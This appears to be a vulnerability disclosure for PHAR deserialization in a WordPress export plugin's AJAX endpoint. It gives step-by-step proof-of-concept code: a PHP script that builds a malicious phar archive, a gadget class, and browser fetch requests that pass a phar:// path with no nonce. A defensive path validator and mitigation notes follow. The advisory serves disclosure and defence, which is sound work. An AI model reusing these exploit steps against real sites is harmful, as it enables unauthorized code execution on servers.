1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

```php
<?php
// Placeholder class whose instance is stored as phar metadata; the gadget
// class of the same name (step 3) is what the target actually deserializes.
class Evil {}

try {
    $pharFile = 'poc.phar';

    // Remove a stale archive from a previous run.
    if (file_exists($pharFile)) {
        unlink($pharFile);
    }

    // Writing a phar requires phar.readonly=0 (e.g. php -d phar.readonly=0 poc.php).
    $phar = new Phar($pharFile);
    $phar->addFromString('test.txt', 'text');
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    $phar->setMetadata(new Evil());

    echo "$pharFile successfully created" . PHP_EOL;
} catch (Exception $e) {
    echo $e->getMessage();
}
```

3. Add the following code to the server to simulate a gadget:

```php
<?php
class Evil {
    // Runs when the phar metadata is unserialized on the target.
    function __wakeup() {
        die('Arbitrary deserialization');
    }
}
```

4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.

```javascript
await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    "method": "POST",
    "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
    "mode": "cors"
});
```

5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.

```javascript
await fetch("", {
    "credentials": "include",
    "headers": {},
    "method": "GET",
    "mode": "cors"
});
```
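The root cause in the steps above is that the user-supplied `filepath` reaches filesystem calls unchecked, so a `phar://` path is enough to trigger metadata deserialization on PHP 7.4 and earlier. The following validator is an added defensive example, not code from the plugin; the function name, the export directory and the demo files are assumptions. The AJAX handler should also verify a nonce with `check_ajax_referer()` and a capability with `current_user_can()`, since the page notes no nonce is required.

```php
<?php
// Added defensive example, not the plugin's code. Function and directory names
// are assumptions. Stream wrappers are rejected by string inspection before any
// filesystem call, because on PHP <= 7.4 even file_exists() on a phar:// path
// unserializes the archive metadata.

function safe_export_path(string $userPath, string $baseDir): ?string
{
    // 1. Any URL scheme (phar://, php://, data://, ...) is refused first;
    //    nothing below may touch the path before this check.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $userPath)) {
        return null;
    }
    // 2. NUL bytes can truncate the path inside C-level calls.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // 3. Treat the input as relative to the export directory, then canonicalise
    //    (resolves "..", "." and symlinks; false if the file does not exist).
    $resolved = realpath($base . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($resolved === false) {
        return null;
    }
    // 4. The canonical path must still sit inside the export directory.
    if (strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $resolved;
}

// Constructed demo: a temporary export directory holding one legitimate file.
$base = sys_get_temp_dir() . '/export_demo_' . getmypid();
mkdir($base);
file_put_contents($base . '/export.xml', '<items/>');

var_dump(safe_export_path('export.xml', $base));                            // legitimate file
var_dump(safe_export_path('phar:///var/www/html/poc.phar/test.txt', $base)); // wrapper refused
var_dump(safe_export_path('../../../etc/passwd', $base));                    // traversal refused
```

PHP 8.0 and later no longer unserialize phar metadata automatically on file operations, which is why step 1 pins the version; the path check is still needed there, since traversal outside the export directory does not depend on the PHP version.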